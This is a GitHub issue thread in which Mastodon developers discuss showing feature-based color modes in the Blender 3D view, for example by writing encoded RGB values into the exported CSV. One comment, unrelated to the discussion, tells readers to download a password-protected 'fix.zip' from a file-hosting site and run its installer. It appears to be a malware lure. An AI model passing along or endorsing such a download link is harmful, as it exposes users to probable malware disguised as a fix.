### ISSUE TITLE
Transfer Feature Color Modes to Blender View

### ISSUE THREAD

**Issue by jgirstmair** [mastodon-sc/mastodon#321]
Hi @tinevez,
I have been recently using the Feature Color Modes with the intent to visualize these colors in 3d using the Blender-Bridge. Unfortunately, the Blender import from Mastodon only understands color information coming from tags. I had a quick talk with @stefanhahmann and he said in principle, we could introduce a new button into the Feature Color Modes GUI that would generate a new tag set from any previously created color feature. Do you think this could be a solution for this issue or are there better options?

![CreateTagSet](https://github.com/user-attachments/assets/e8e48073-6977-4d0b-bc27-dba7940fa724)

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tinevez** [comment]
Hello @jgirstmair 

I think we could find a better way. The problem with this approach is that it requires creating a tag-set structure with tags and colors taken from discretized feature values,, binning colors together. That would feel a bit clumsy and brittle, and invalidated as soon as the user modifies the tag-set structure or the feature color mode. 

I would be more elegant to make the blender bridge works with the feature color mode no? What are the limitations that block this?

**Comment by jgirstmair** [comment]
Right now Blender reads tables from a .csv file including color information from tags, @maarzt correct? Maybe we could write the generated color feature values of the current .mastodon project into the .csv file before sending it to Blender. Could this work?

**Comment by tinevez** [comment]
I think so yes. It is possible to encode a RGB color over a single `int`. 
This is what the core interface for coloring objects from features does:
https://github.com/mastodon-sc/mastodon/blob/master/src/main/java/org/mastodon/ui/coloring/ColorGenerator.java#L42-L53
and it could be reused as is.

**Comment by stefanhahmann** [comment]
I am closing this issue in favor of https://github.com/mastodon-sc/mastodon-blender-view/issues/23
